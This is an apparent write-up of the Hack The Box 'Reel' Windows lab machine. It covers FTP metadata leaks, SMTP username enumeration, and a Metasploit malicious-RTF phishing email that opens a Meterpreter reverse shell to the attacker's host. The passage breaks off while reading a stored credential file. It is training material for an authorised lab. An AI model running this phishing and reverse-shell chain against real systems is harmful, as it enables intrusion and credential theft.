HTB Reel CTF Writeup
HTB Reel CTF is a "Hard" difficulty Windows machine on Hack The Box.
Challenge Summary
HTB Reel CTF is about a Windows Server 2012 R2 domain: we’ll leak a username via FTP metadata, verify it on SMTP, craft a malicious RTF to pop a Meterpreter shell as nico, then ride PowerShell creds and AD ACL tricks to hop nico→tom→claire, and finally unearth the admin password hidden in backup scripts to own the box.
flowchart TD
A["Service Enumeration"] -->|"FTP, SSH, SMTP, SMB"| B["FTP Enumeration"]
B -->|"Download docs & metadata"| C["Leak [email protected]"]
C -->|"SMTP RCPT TO checks"| D["Validate user \"nico\""]
D -->|"Craft malicious RTF"| E["Initial shell as HTB\\nico"]
E -->|"Find cred.xml & decrypt"| F["Extract Tom's creds"]
F -->|"SSH/SMB login"| G["Access as Tom"]
G -->|"PowerView ACL enum"| H["Tom has WriteOwner on Claire"]
H -->|"Reset Claire's password"| I["SSH as Claire"]
I -->|"ACL on Backup_Admins"| J["Claire→Backup_Admins member"]
J -->|"Run winPEAS"| K["Discover admin password"]
K -->|"SSH as Administrator"| L["Win! Administrator access"]
Service Enumeration
Summary
A full-port scan revealed anonymous FTP, SSH, SMTP, SMB and various RPC endpoints on a Windows Server 2012 R2 host, mapping out our attack surface.
Details
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
# Nmap 7.93 scan initiated Fri May 2 22:42:53 2025 as: nmap -Pn -vv -A -p- -oN scans/nmap.all 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up, received user-set (0.18s latency).
Scanned at 2025-05-02 22:42:53 BST for 490s
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh syn-ack OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 8220c3bd16cba29c88871d6c1559eded (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQkehAZGj87mZluxFiVu+GPAAnC/OQ9QKUF2wlIwvefrD2L4zWyGXlAgSbUq/MqujR/efrTIjPYWK+5Mlxc7gEoZBylGAPbdxFivL8YQs3dQPt6aHNF0v+ABS01L2qZ4ewd1sTi1TlT6LtWHehX2PBJ6S3LWG09v+E/3ue97y9gaOjfA6BCMWgQ7K3yvQeHrRpBSk/vQxfCh4TINwV3EGbGTfbs8VvvR+Et7weB5EOifgXfHbyh04KemONkceFSAnjRRYOgwvtXai9imsDJ8KtS2RMR197VK4MBhsY7+h0nOvUMgm76RcRc6N8GW1mn6gWp98Ds9VeymzAmQvprs97
| 256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAw2CYanDlTRpGqzVXrfGTcAYVe/vUnnkWicQPzdfix5gFsv4nOGNUM+Fko7QAW0jqCFQKc8anGAwJjFGLTB00k=
| 256 ac8bde251db7d838389b9c16bff63fed (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICdDfn+n5xueGtHP20/aPkI8pvCfxb2UZA3RQdqnpjBk
25/tcp open smtp? syn-ack
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc syn-ack Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.93%I=7%D=5/2%Time=68153D7A%P=x86_64-pc-linux-gnu%r(NULL,
SF:18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20Se
SF:rvice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%r
SF:(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EHL
SF:O\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")
SF:%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20se
SF:quence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x2
SF:0sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands
SF:\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVers
SF:ionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusRequ
SF:estTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"22
SF:0\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20M
SF:ail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n
SF:")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerberos
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mail
SF:\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20rea
SF:dy\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n503
SF:\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x
SF:20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")%
SF:r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindReq
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Mai
SF:l\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence
SF:\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x
SF:20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20
SF:commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m35s, median: 0s
| smb2-time:
| date: 2025-05-02T21:50:24
|_ start_date: 2025-05-02T19:49:40
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2025-05-02T22:50:25+01:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 4286/tcp): CLEAN (Timeout)
| Check 2 (port 24595/tcp): CLEAN (Timeout)
| Check 3 (port 32588/udp): CLEAN (Timeout)
| Check 4 (port 37930/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 302:
|_ Message signing enabled and required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 2 22:51:03 2025 -- 1 IP address (1 host up) scanned in 490.54 seconds
FTP Service Enumeration
Summary
Anonymous FTP let us grab two Word docs and a readme. By inspecting the DOCX metadata, we surfaced [email protected]—a golden username for our next moves.
Details
I could log in to the FTP server anonymously:
1
2
3
4
5
6
7
8
9
$ ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:user): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
There was an immediate folder (documents/) and inside this folder, some files:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ftp> ls
229 Entering Extended Passive Mode (|||41004|)
125 Data connection already open; Transfer starting.
05-29-18 12:19AM <DIR> documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||41005|)
125 Data connection already open; Transfer starting.
05-29-18 12:19AM 2047 AppLocker.docx
05-28-18 02:01PM 124 readme.txt
10-31-17 10:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp>
I downloaded all of them using the mget command:
1
2
3
4
5
6
7
ftp> mget *
mget AppLocker.docx [anpqy?]? y
<SNIP>
mget readme.txt [anpqy?]? y
<SNIP>
mget Windows Event Forwarding.docx [anpqy?]? y
<SNIP>
The readme.txt file indicates I can somehow email
AppLocker.docx describes policies in place in the organization:
The second MS Word file, I couldn’t open using LibreOffice because it says it’s corrupted:
I selected “yes” in order to allow LibreOffice to try and repair the file, but it couldn’t repair it. So I proceeded to analyse metadata for this specific file:
1
2
$ file Windows\ Event\ Forwarding.docx
Windows Event Forwarding.docx: Microsoft Word 2007+
The initial bytes, at least, match the correct signature for a MS Word document. The same behavior can be found when inspecting the working file:
1
2
$ file AppLocker.docx
AppLocker.docx: Microsoft Word 2007+
Knowing that MS Word saves a lot of metadata by default…
For a Microsoft Word document, this could include information such as the author of the document, the date and time the document was created, the time spent editing the document, its length, its description, comments about the document, etc. For a digital photograph, the metadata might include the type of camera or other device used to create the image, the location where it was taken, and the date and time it was taken, as well as other information. [source]
I dumped all metadata using the exiftool command:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
$ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.57
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2017:10:31 19:13:23-02:00
File Access Date/Time : 2025:05:06 15:04:27-03:00
File Inode Change Date/Time : 2025:05:02 18:39:04-03:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : [email protected]
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
And sure enough I got what seems to be a valid username in the system:
Just to make sure I’m not missing anything not viewing the file, I used binwalk tool to extract the “corrupted” MS word doc:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ binwalk Windows\ Event\ Forwarding.docx -e
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 Zip archive data, at least v2.0 to extract, compressed size: 385, uncompressed size: 1422, name: [Content_Types].xml
954 0x3BA Zip archive data, at least v2.0 to extract, compressed size: 243, uncompressed size: 590, name: _rels/.rels
1758 0x6DE Zip archive data, at least v2.0 to extract, compressed size: 290, uncompressed size: 953, name: word/_rels/document.xml.rels
2370 0x942 Zip archive data, at least v2.0 to extract, compressed size: 2337, uncompressed size: 23414, name: word/document.xml
4754 0x1292 Zip archive data, at least v2.0 to extract, compressed size: 1704, uncompressed size: 7076, name: word/theme/theme1.xml
6509 0x196D Zip archive data, at least v2.0 to extract, compressed size: 925, uncompressed size: 2286, name: word/settings.xml
7481 0x1D39 Zip archive data, at least v2.0 to extract, compressed size: 258, uncompressed size: 428, name: word/webSettings.xml
7789 0x1E6D Zip archive data, at least v2.0 to extract, compressed size: 1991, uncompressed size: 15713, name: word/stylesWithEffects.xml
9835 0x266B Zip archive data, at least v2.0 to extract, compressed size: 323, uncompressed size: 599, name: docProps/core.xml
10492 0x28FC Zip archive data, at least v2.0 to extract, compressed size: 1862, uncompressed size: 14960, name: word/styles.xml
12399 0x306F Zip archive data, at least v2.0 to extract, compressed size: 543, uncompressed size: 1477, name: word/fontTable.xml
12990 0x32BE Zip archive data, at least v2.0 to extract, compressed size: 481, uncompressed size: 991, name: docProps/app.xml
14558 0x38DE End of Zip archive, footer length: 22
It created the folder containing the extracted contents (_Windows Event Forwarding.docx.extracted):
1
2
3
$ ls
AppLocker.docx 'Windows Event Forwarding.docx'
readme.txt '_Windows Event Forwarding.docx.extracted'
To know where to look at, I also extracted the working document (AppLocker.docx):
1
2
3
4
5
6
7
8
9
10
11
$ binwalk -e AppLocker.docx
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 Zip archive data, at least v2.0 to extract, name: _rels/.rels
223 0xDF Zip archive data, at least v2.0 to extract, name: word/_rels/document.xml.rels
479 0x1DF Zip archive data, at least v2.0 to extract, name: word/document.xml
963 0x3C3 Zip archive data, at least v2.0 to extract, name: word/numbering.xml
1151 0x47F Zip archive data, at least v2.0 to extract, name: word/styles.xml
1333 0x535 Zip archive data, at least v2.0 to extract, name: [Content_Types].xml
2025 0x7E9 End of Zip archive, footer length: 22
I changed directory to the .extracted one just created by binwalk:
1
2
$ cd _AppLocker.docx.extracted/
user@attackbox:~/hacking/htb/machines/hard/reel/ftp/_AppLocker.docx.extracted$
And as I have normal access to it when opening via LibreOffice, I used “grep” to search for a string that I know is in the document (in this case, the very beginning “AppLocker procedure”):
1
2
$ grep -Rl 'AppLocker procedure' .
./word/document.xml
And sure enough, I could find where the document contents reside (word/document.xml).
I changed directories back to the root of my dirtree, and changed again, this time into the .extracted folder for the “corrupted” document:
1
2
$ cd _Windows\ Event\ Forwarding.docx.extracted/word/
user@attackbox:~/hacking/htb/machines/hard/reel/ftp/_Windows Event Forwarding.docx.extracted/word$
I used the best text editor (Sublime Text) to inspect _Windows\ Event\ Forwarding.docx.extracted/word/document.xml, but as you can see, it looks like garbage:
I notice a lot of XML tags. Wondering if removing all of those would do any better, I created a simple python script to strip them off:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/env python3
import re
import sys
def strip_xml_tags(text):
"""
Remove all substrings that look like XML/HTML tags,
i.e., anything between < and > (non-greedy).
"""
# The regex '<[^>]+?>' matches '<', then one or more chars that are not '>', then the first '>'
return re.sub(r'<[^>]+?>', '', text)
def process_file(input_path, output_path=None):
# Read the whole file
with open(input_path, 'r', encoding='utf-8') as f:
content = f.read()
# Strip tags
clean = strip_xml_tags(content)
if output_path:
# Write cleaned text
with open(output_path, 'w', encoding='utf-8') as out:
out.write(clean)
print(f"Stripped tags and saved to {output_path}")
else:
# Print to stdout
print(clean)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python strip_xml.py <input.xml> [output.txt]")
sys.exit(1)
inp = sys.argv[1]
out = sys.argv[2] if len(sys.argv) > 2 else None
process_file(inp, out)
I ran my script and obtained a somewhat raw version of the document’s contents:
1
2
3
$ python3 strip-xml.py document.xml
# get winrm configwinrm get winrm/config# gpo configO:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)// add to GPOServer=http://WEF.HTB.LOCAL:5985/wsman/SubscriptionManager/WEC,Refresh=60// add to GPO (60 seconds)on source computer: gpupdate /force# prereqsstart Windows Remote Management service on source computeradd builtin\network service account to "Event Log Readers" group on collector server# list subscriptions / exportC:\Windows\system32>wecutil es > subs.txt# check subscription statusC:\Windows\system32>wecutil gr "Account Currently Disabled"Subscription: Account Currently Disabled RunTimeStatus: Active LastError: 0 EventSources: LAPTOP12.HTB.LOCAL RunTimeStatus: Active LastError: 0 LastHeartbeatTime: 2017-07-11T13:27:00.920# change pre-rendering setting in multiple subscriptionsfor /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events# export subscriptions to xmlfor /F "tokens=*" %i in (subs.txt) DO wecutil gs "%i" /f:xml >> "%i.xml"# import subscriptions from xmlwecutil cs "Event Log Service Shutdown.xml"wecutil cs "Event Log was cleared.xml"# if get error "The locale specific resource for the desired message is not present", change subscriptions to Event format (won't do any hard running command even if they already are in this format)1.for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events2.Under Windows Regional Settings, on the Formats tab, change the format to "English (United States)"# check subscriptions are being created on the source computerEvent Log: /Applications and Services Logs/Microsoft/Windows/Eventlog-ForwardingPlugin/Operational#### troubleshooting WEFcollector server -> subscription name -> runtime statusgpupdate /force (force checkin, get subscriptions)check Microsoft/Windows/Eventlog-ForwardingPlugin/Operational for errors
However, there’s honestly not very much to it.
The “mystery” DOCX was just a Windows Event Forwarding playbook. TL;DR:
-
Lock down WinRM • Dump and tweak its ACL via an SDDL string in GPO so SYSTEM, Admins, Event Log Readers and Network Service can all talk.
-
Point clients at your collector • GPO → WinRM Client → SubscriptionManager =
http://WEF.HTB.LOCAL:5985/wsman/SubscriptionManager/WEC,Refresh=60•gpupdate /forceto make it stick. -
Prep machines • On each source: start the WinRM service. • On the collector: add the Network Service account to the “Event Log Readers” group.
-
Manage subscriptions with
wecutil-
wecutil es→ list subs → save names tosubs.txt -
wecutil gr &quot;&lt;name&gt;&quot;→ check status, errors, heartbeats -
Bulk-fix to raw XML:
1
for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events
-
Export each sub to its own XML:
1
for /F "tokens=*" %i in (subs.txt) DO wecutil gs "%i" /f:xml >> "%i.xml"
-
Re-import on any collector with
wecutil cs &quot;&lt;sub&gt;.xml&quot;.
-
-
Locale gotchas • If you hit “locale resource not found,” either force raw XML again or switch your Regional Format to English (United States).
-
Final check • Run
wecutil esorwecutil gr &quot;&lt;name&gt;&quot;—everything should be Active with LastError: 0 and fresh heartbeats.
Boom—the corrupt DOC just hid a WEF cheat-sheet, nothing more arcane than command-line magic for centralizing Windows event logs. Yes, it does leak some info like:
1
http://WEF.HTB.LOCAL:5985
Or even:
1
LAPTOP12.HTB.LOCAL
But none of this helps us completing the challenge. The important thing to get out of this is really the metadata info leaking the username. We’ll use it soon.
Mail Server Enumeration
Summary
Hitting the SMTP server with RCPT TO checks confirmed that [email protected] is a valid recipient, locking in our target account.
Details
There are well-known and documented ways to enumerate usernames in a SMTP server, and I could do just that in the following snippet:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ telnet 10.10.10.77 25
Trying 10.10.10.77...
Connected to 10.10.10.77.
Escape character is '^]'.
220 Mail Service ready
HELO X
250 Hello.
MAIL FROM:[email protected]
250 OK
RCPT TO:[email protected]
550 Unknown user
RCPT TO:[email protected]
250 OK
^[^]
telnet> quit
Connection closed.
You see how it recognizes “[email protected]” but says “[email protected]” is unknown. That means nico is indeed a valid username, at least in the mailserver.
Initial Shell
Summary
Using Metasploit’s office_word_hta module, we built a malicious RTF, emailed it to Nico, and scored a Meterpreter session as HTB\nico when the victim opened it.
Details
Using the acquired knowledge to this point from the FTP and SMTP server(s) enumeration, the attack path is clear: I g otta email “[email protected]” a malicious RTF attachment that somehow grants me access to privileged info or even a shell on the box.
I fired up msfconsole and searched for rft-related exploits:
1
2
3
4
5
6
7
8
9
10
11
12
msf6> search rtf
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
<SNIP>
17 exploit/windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882
18 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution
19 exploit/unix/webapp/openmediavault_rpc_rce 2020-09-28 excellent Yes OpenMediaVault rpc.php Authenticated PHP Code Injection
<SNIP>
A lot came up. Reading through, some of them are related to old CVEs, some of them not related at all to what I’m looking for, until, my gaze met exploit no. 18 (exploit/windows/fileformat/office_word_hta):
1
Microsoft Office Word Malicious Hta Execution
I selected it, and began to look through the configuration options:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
msf6> use 18
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. Th
is must be an address on the local machine or 0.0.0.
0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randoml
y generated)
URIPATH default.hta yes The URI to use for the HTA file
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process,
none)
LHOST 10.137.0.20 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
View the full module info with the info, or info -d command.
I ran the “info” command to make sure I know the details about the module, and it talks about a vulnerability in MS word from back in 2016:
1
2
3
4
5
6
7
8
9
10
11
12
13
msf6 exploit(windows/fileformat/office_word_hta) > info
<SNIP>
Description:
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute hta code in response.
This bug was originally seen being exploited in the wild starting
in Oct 2016. This module was created by reversing a public
malware sample.
And it’s interesting because from the exiftool output from earlier, I notice that the document was created around 2017 as well:
1
2
3
4
5
6
7
8
9
10
11
12
13
$ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.57
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2017:10:31 19:13:23-02:00
<SNIP>
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
<SNIP>
So it’s completely possible the MS word version they’re using is dated from back when this was still exploitable. I began configuring the exploit (which honestly didn’t require much):
1
2
3
4
msf6 exploit(windows/fileformat/office_word_hta) > set SRVHOST tun0
SRVHOST => 10.10.14.5
msf6 exploit(windows/fileformat/office_word_hta) > set LHOST tun0
LHOST => 10.10.14.5
And ran it:
1
2
3
4
5
6
7
8
msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.5:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/user/.msf4/local/msf.doc
[*] Using URL: http://10.10.14.5:8080/default.hta
[*] Server started.
It created my malicious RTF file at /home/user/.msf4/local/msf.doc (as seen from the output above). I copied it to my CWD:
1
$ cp /home/user/.msf4/local/msf.doc .
And I also created another copy, but with the .rtf extension just to make sure:
1
$ cp msf.doc msf.rtf
I have both files in my CWD:
1
2
$ ls
ftp msf.doc msf.rtf scans
And, with those files, and the jobs running in my msfconsole terminal, waiting for connection:
1
2
3
4
5
6
7
8
9
msf6 exploit(windows/fileformat/office_word_hta) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: windows/fileformat/office windows/meterpreter/reverse tcp://10.10.14.5:4444
_word_hta
I could send the email to “[email protected]”, attaching my precious msf.rtf file:
1
2
$ sendEmail -t [email protected] -f [email protected] -s 10.10.10.77 -u "Important subject" -m 'convert it for me please' -a msf.rtf
May 06 16:26:27 localhost sendEmail[17091]: Email was sent successfully!
It’s honestly funny the fact that I can send emails using the mailserver without having a valid account myself, no credentials whatsoever, just a random username. I never knew something like that is possible. Lesson learned!
After a few seconds, I got a hit in the webserver hosting the HTA file (from msfconsole) and the meterpreter session right after:
1
2
3
msf6 exploit(windows/fileformat/office_word_hta) >
[*] Sending stage (177734 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.77:50699) at 2025-05-06 16:26:48 -0300
To validate that I’m in fact in the victim machine, I ran those few commands:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
msf6 exploit(windows/fileformat/office_word_hta) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows HTB\nico @ REEL 10.10.14.5:4444 -> 10.10.10.77:50699 (
10.10.10.77)
msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
meterpreter > getuid
Server username: HTB\nico
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 12
============
Name : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:50:56:b0:44:fa
MTU : 1500
IPv4 Address : 10.10.10.77
IPv4 Netmask : 255.255.255.0
IPv6 Address : dead:beef::10
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
IPv6 Address : fe80::391e:7631:e535:a302
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 13
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a0a:a4d
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
meterpreter >
Horizontal Privilege Escalation: nico -> tom
Summary
On Nico’s desktop, cred.xml held an encrypted PSCredential. We spun up a PowerShell reverse shell, decrypted it to get Tom’s password (`1ts-mag1c!!!`), and logged in as Tom.
Details
In my meterpreter session, I began enumerating folders that “nico” is owner of, until I landed on their Desktop folder:
1
2
3
4
5
6
7
8
9
10
11
meterpreter > ls
Listing: C:\users\nico\Desktop
==============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 1468 fil 2017-10-27 21:59:16 -0200 cred.xml
100666/rw-rw-rw- 282 fil 2017-10-27 20:42:45 -0200 desktop.ini
100444/r--r--r-- 34 fil 2025-05-05 12:38:47 -0300 user.txt
100777/rwxrwxrwx 10144768 fil 2025-05-05 16:58:36 -0300 win.exe
100666/rw-rw-rw- 162 fil 2017-10-27 19:34:38 -0200 ~$iledDeliveryNotification.doc
Reading contents of cred.xml revealed that the file is a PSCredential object in XML format for system user Tom:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > cat cred.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
